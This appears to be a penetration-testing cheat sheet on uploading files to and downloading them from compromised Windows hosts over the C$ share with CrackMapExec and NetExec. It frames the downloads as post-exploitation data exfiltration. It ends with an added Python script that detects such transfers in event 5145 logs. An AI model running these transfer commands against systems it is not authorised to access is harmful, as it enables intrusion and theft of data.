
CrackMapExec (NetExec)

Below is a cheat sheet for transporting files using CrackMapExec (CME) and Netexec during post-exploitation. These tools are widely used in penetration testing, especially when working with SMB and remote systems in Windows environments.

Uploading Files to Victims Using CrackMapExec and Netexec

1. CrackMapExec (CME) - Uploading Files

CrackMapExec is a popular tool for interacting with SMB shares and automating tasks like file transfers, enumeration, and exploitation. It can be used to upload files to remote systems that are accessible via SMB.

Attacking Machine Command (Upload File using CrackMapExec):

crackmapexec smb 10.10.10.10 -u username -p password --share C$ --put-file /path/to/local/file.txt \\path\\to\\remote\\file.txt

Explanation:

  • crackmapexec smb tells CME to use the SMB protocol.

  • 10.10.10.10 is the IP address of the victim machine.

  • -u username -p password specifies the credentials.

  • --share C$ selects the C$ share (administrative share), which is also the default share for file transfers.

  • --put-file /path/to/local/file.txt \\path\\to\\remote\\file.txt uploads a local file to the remote machine. The first argument is the local file; the second is the destination path, given relative to the selected share.

2. Netexec - Uploading Files

NetExec is the community-maintained successor to CrackMapExec and facilitates command execution and file transfers. It allows users to upload files to remote systems over SMB.

Attacking Machine Command (Upload File using Netexec):

netexec smb 10.10.10.10 -u username -p password --share C$ --put-file /path/to/local/file.txt \\path\\to\\remote\\file.txt

Explanation:

  • netexec is the command-line tool used for execution (it is also installed as nxc); smb selects the SMB protocol.

  • 10.10.10.10 specifies the target victim machine’s IP address.

  • -u username -p password provides the necessary credentials for authentication.

  • --share C$ selects the C$ administrative share (the default).

  • --put-file /path/to/local/file.txt \\path\\to\\remote\\file.txt specifies the local file to be uploaded, followed by the destination path on the remote machine, relative to the selected share.


Downloading Files from Victims Using CrackMapExec and Netexec

1. CrackMapExec (CME) - Downloading Files

CrackMapExec can also be used to download files from remote systems over SMB. This can be useful for exfiltrating data after successful exploitation.

Attacking Machine Command (Download File using CrackMapExec):

crackmapexec smb 10.10.10.10 -u username -p password --share C$ --get-file \\path\\to\\remote\\file.txt /path/to/local/file.txt

Explanation:

  • --share C$ selects the C$ administrative share (the default).

  • --get-file \\path\\to\\remote\\file.txt /path/to/local/file.txt specifies that the file located at the given remote path (relative to the selected share) will be downloaded to the specified local path.

2. Netexec - Downloading Files

Netexec can also be used to download files from the victim system. This is useful for extracting valuable files during a post-exploitation phase.

Attacking Machine Command (Download File using Netexec):

netexec smb 10.10.10.10 -u username -p password --share C$ --get-file \\path\\to\\remote\\file.txt /path/to/local/file.txt

Explanation:

  • --share C$ selects the C$ administrative share (the default).

  • --get-file takes two arguments: \\path\\to\\remote\\file.txt specifies the remote file to be downloaded (relative to the selected share), and /path/to/local/file.txt defines where the downloaded file will be saved on the attacking machine.
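
On the target side, file transfers over the C$ administrative share are recorded as Security event 5145 when detailed file share auditing is enabled. The following is an added example, not part of the original page or of either tool: it triages exported 5145 records for remote reads and writes on administrative shares. The sample events are constructed, and the dictionary layout (one dict per event, keyed by the event's field names) is an assumption about how the logs were exported.

```python
# Added example: triage Windows Security event 5145 records for remote
# file reads/writes on administrative shares. Sample data is constructed.
ADMIN_SHARES = {"C$", "ADMIN$"}
READ_DATA, WRITE_DATA, APPEND_DATA = 0x1, 0x2, 0x4   # AccessMask bits
LOCAL_SOURCES = {None, "", "-", "127.0.0.1", "::1"}

SAMPLE_EVENTS = [  # constructed; keys follow the 5145 event field names
    {"EventID": 5145, "SubjectUserName": "username", "IpAddress": "10.10.10.50",
     "ShareName": r"\\*\C$", "RelativeTargetName": r"path\to\remote\file.txt",
     "AccessMask": "0x2"},
    {"EventID": 5145, "SubjectUserName": "username", "IpAddress": "10.10.10.50",
     "ShareName": r"\\*\C$", "RelativeTargetName": r"path\to\remote\file.txt",
     "AccessMask": "0x120089"},
    {"EventID": 5145, "SubjectUserName": "alice", "IpAddress": "10.10.10.60",
     "ShareName": r"\\*\Public", "RelativeTargetName": "notes.txt",
     "AccessMask": "0x2"},
    {"EventID": 5145, "SubjectUserName": "username", "IpAddress": "10.10.10.50",
     "ShareName": r"\\*\C$", "RelativeTargetName": "path",
     "AccessMask": "0x80"},   # attribute query only, no data access
    {"EventID": 5140, "SubjectUserName": "username", "IpAddress": "10.10.10.50",
     "ShareName": r"\\*\C$"},
]

def classify(event):
    """Return 'write', 'read' or None for a single event record."""
    if event.get("EventID") != 5145:
        return None
    share = event.get("ShareName", "").rsplit("\\", 1)[-1].upper()
    if share not in ADMIN_SHARES or event.get("IpAddress") in LOCAL_SOURCES:
        return None
    mask = int(event.get("AccessMask", "0x0"), 16)
    if mask & (WRITE_DATA | APPEND_DATA):
        return "write"
    return "read" if mask & READ_DATA else None

def admin_share_transfers(events):
    """List (kind, source_ip, user, path) for each admin-share data access."""
    hits = []
    for ev in events:
        kind = classify(ev)
        if kind:
            hits.append((kind, ev["IpAddress"], ev["SubjectUserName"],
                         ev["RelativeTargetName"]))
    return hits

if __name__ == "__main__":
    for hit in admin_share_transfers(SAMPLE_EVENTS):
        print(*hit, sep="  ")
```
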



Last updated 2 months ago